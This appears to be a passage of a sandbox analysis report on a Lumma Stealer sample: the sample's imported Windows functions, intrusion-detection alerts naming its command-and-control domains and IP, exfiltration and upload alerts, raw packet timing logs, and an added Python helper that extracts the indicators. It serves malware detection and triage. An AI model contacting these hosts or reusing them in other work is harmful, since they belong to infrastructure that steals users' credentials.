kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
ole32.dll | CoDisconnectObject
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SysFreeString
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-14T08:55:29.501594+0100 | 2059209 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) | 1 | 192.168.2.7 | 53926 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.512052+0100 | 2059189 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) | 1 | 192.168.2.7 | 60418 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.525032+0100 | 2059211 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) | 1 | 192.168.2.7 | 53853 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.536919+0100 | 2059201 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) | 1 | 192.168.2.7 | 50817 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.555067+0100 | 2059203 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) | 1 | 192.168.2.7 | 55020 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.565601+0100 | 2059199 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) | 1 | 192.168.2.7 | 63764 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.576398+0100 | 2059207 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) | 1 | 192.168.2.7 | 57122 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.590693+0100 | 2059191 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) | 1 | 192.168.2.7 | 63949 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:30.340433+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | TCP
2025-01-14T08:55:30.913240+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | TCP
2025-01-14T08:55:31.723597+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:32.157732+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:32.157732+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:32.657578+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:33.142625+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:33.142625+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:34.216699+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49812 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:35.773469+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49825 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:36.313357+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49825 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:37.163604+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49838 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:38.722180+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49849 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:40.356462+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49860 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:40.360671+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.7 | 49860 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:42.730990+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49876 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:43.203229+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49876 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:43.859968+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49883 | 162.125.66.18 | 443 | TCP
2025-01-14T08:55:45.745487+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49897 | 162.125.66.15 | 443 | TCP
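The alert sequence is the useful part of this table: eight DNS lookups for .lat domains within about 90 ms, a Steam profile lookup, then repeated TLS sessions to 188.114.96.3 that the rules tag as CnC host checkin, exfiltration and a zipped "screen." upload. The Python below is an added triage helper, not part of the Joe Sandbox report: it parses alert rows, refangs the C2 domains out of the "DNS Lookup (label .tld)" signature text, and separates hosts that carry a severity-1 MALWARE alert from hosts that only matched the JA3 rule. The input rows are constructed from this table (a subset of it), one alert per line with the columns in the table's header order separated by " | "; the column names and the `malware_hosts` criterion are this example's own choices.

```python
"""Triage helper for the Suricata alerts in this report: parse the alert rows,
refang the C2 domains from the DNS-lookup signatures, and list the hosts that
received a severity-1 MALWARE alert. Added example; not part of the report."""
import re
from collections import OrderedDict

COLUMNS = ["timestamp", "sid", "signature", "severity",
           "src_ip", "src_port", "dst_ip", "dst_port", "proto"]

# ET 'CnC Domain in DNS Lookup' rule messages carry the domain defanged as
# "label .tld"; capture both halves so the indicator can be refanged.
DNS_LOOKUP_RE = re.compile(r"DNS Lookup \(([A-Za-z0-9.-]+) \.([A-Za-z]+)\)")

# Constructed from the report's alert table (a subset of its rows), one alert
# per line, columns in the table's header order, separated by ' | '.
SAMPLE_ALERTS = """\
2025-01-14T08:55:29.501594+0100 | 2059209 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) | 1 | 192.168.2.7 | 53926 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:29.512052+0100 | 2059189 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) | 1 | 192.168.2.7 | 60418 | 1.1.1.1 | 53 | UDP
2025-01-14T08:55:30.340433+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | TCP
2025-01-14T08:55:30.913240+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | TCP
2025-01-14T08:55:32.157732+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:36.313357+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49825 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:40.360671+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.7 | 49860 | 188.114.96.3 | 443 | TCP
2025-01-14T08:55:43.859968+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49883 | 162.125.66.18 | 443 | TCP
"""


def parse_alerts(text):
    """Turn pipe-delimited alert rows into dicts with typed SID/severity/ports."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != len(COLUMNS):
            raise ValueError(f"expected {len(COLUMNS)} columns, got {len(fields)}: {line!r}")
        row = dict(zip(COLUMNS, fields))
        for key in ("sid", "severity", "src_port", "dst_port"):
            row[key] = int(row[key])
        alerts.append(row)
    return alerts


def refang_domain(signature):
    """'... DNS Lookup (shoefeatthe .lat)' -> 'shoefeatthe.lat'; None if no domain."""
    m = DNS_LOOKUP_RE.search(signature)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def extract_iocs(alerts):
    """Return the refanged C2 domains, the dst IPs that carry a severity-1
    MALWARE alert over TCP, and every SID seen per dst IP.

    DNS alerts are attributed to the resolver (1.1.1.1 here), so for those
    rows the domain, not the dst IP, is the indicator. A JA3 match on its own
    (severity 3) is not enough to call a host malicious, so IPs that only hit
    the JA3 rule stay in sids_by_ip but are left out of malware_hosts."""
    domains, sids_by_ip = [], OrderedDict()
    for a in alerts:
        d = refang_domain(a["signature"])
        if d and d not in domains:
            domains.append(d)
        sids_by_ip.setdefault(a["dst_ip"], set()).add(a["sid"])
    malware_hosts = []
    for a in alerts:
        if (a["proto"] == "TCP" and a["severity"] == 1
                and "MALWARE" in a["signature"] and a["dst_ip"] not in malware_hosts):
            malware_hosts.append(a["dst_ip"])
    return {"domains": domains, "malware_hosts": malware_hosts,
            "sids_by_ip": {ip: sorted(s) for ip, s in sids_by_ip.items()}}


if __name__ == "__main__":
    for key, value in extract_iocs(parse_alerts(SAMPLE_ALERTS)).items():
        print(f"{key}: {value}")
```

The `sids_by_ip` view is what to look at before blocking anything: 188.114.96.3 collects the checkin, exfiltration and POST-upload SIDs and is the host to pivot on, while 162.125.66.18 and 162.125.66.15 appear only under the generic JA3 rule in this table and need more context before they are treated as indicators.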
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.217936993 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.217951059 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.218297005 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.219547987 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.219701052 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.219736099 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031491041 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031733036 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031797886 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031929970 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031949997 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.294579029 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.294624090 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.294698954 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.295000076 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.295016050 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.773395061 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.773468971 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.775234938 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.775247097 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.775595903 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.784928083 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.785116911 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.785161972 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.785240889 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.827337980 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313369036 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313513994 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313718081 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313944101 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313972950 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703536034 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703577995 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703649998 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703946114 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703958988 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.163539886 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.163604021 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.165532112 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.165543079 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.165889025 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174680948 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174871922 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174906015 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174962044 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174971104 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.771752119 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.771985054 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.772043943 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.772115946 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.772139072 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.263803005 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.263860941 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.263972044 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.264408112 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.264426947 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.722069979 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.722179890 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.723931074 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.723949909 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.724278927 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.732178926 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.732260942 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.732270956 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159260035 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159372091 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159446955 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159542084 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159576893 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897121906 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897188902 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897258043 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897591114 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897603035 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.356364965 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.356462002 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.357853889 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.357863903 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.358350992 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.359571934 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360233068 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360268116 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360371113 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360409021 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360513926 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360559940 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360780001 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360795975 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360925913 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360949039 CET44349860188.114.96.3192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 14, 2025 08:55:40.361150980 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.361177921 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:40.361186028 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.361299992 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.361320019 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.370786905 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:40.370970964 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371006012 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371016026 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371037960 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:40.371171951 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371206999 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371211052 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:40.371222019 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371275902 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:40.371300936 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:40.371387959 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.153749943 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.153963089 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.154064894 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.154181957 CET  49860        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.154207945 CET  443          49860      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.264646053 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.264691114 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.264940023 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.265285015 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.265295029 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.730792046 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.730989933 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.732440948 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.732449055 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.732790947 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:42.735028982 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.735100031 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:42.735116005 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:43.203238964 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:43.203396082 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:43.203509092 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:43.204217911 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:43.204240084 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:43.204251051 CET  49876        443        192.168.2.7     188.114.96.3
Jan 14, 2025 08:55:43.204256058 CET  443          49876      188.114.96.3    192.168.2.7
Jan 14, 2025 08:55:43.214541912 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:43.214580059 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:43.214684963 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:43.215094090 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:43.215110064 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:43.859853029 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:43.859967947 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:43.862529993 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:43.862545013 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:43.863049030 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:43.864151001 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:43.907362938 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:44.686580896 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:44.686659098 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:44.686676979 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:44.686712980 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:44.712415934 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:44.712449074 CET  443          49883      162.125.66.18   192.168.2.7
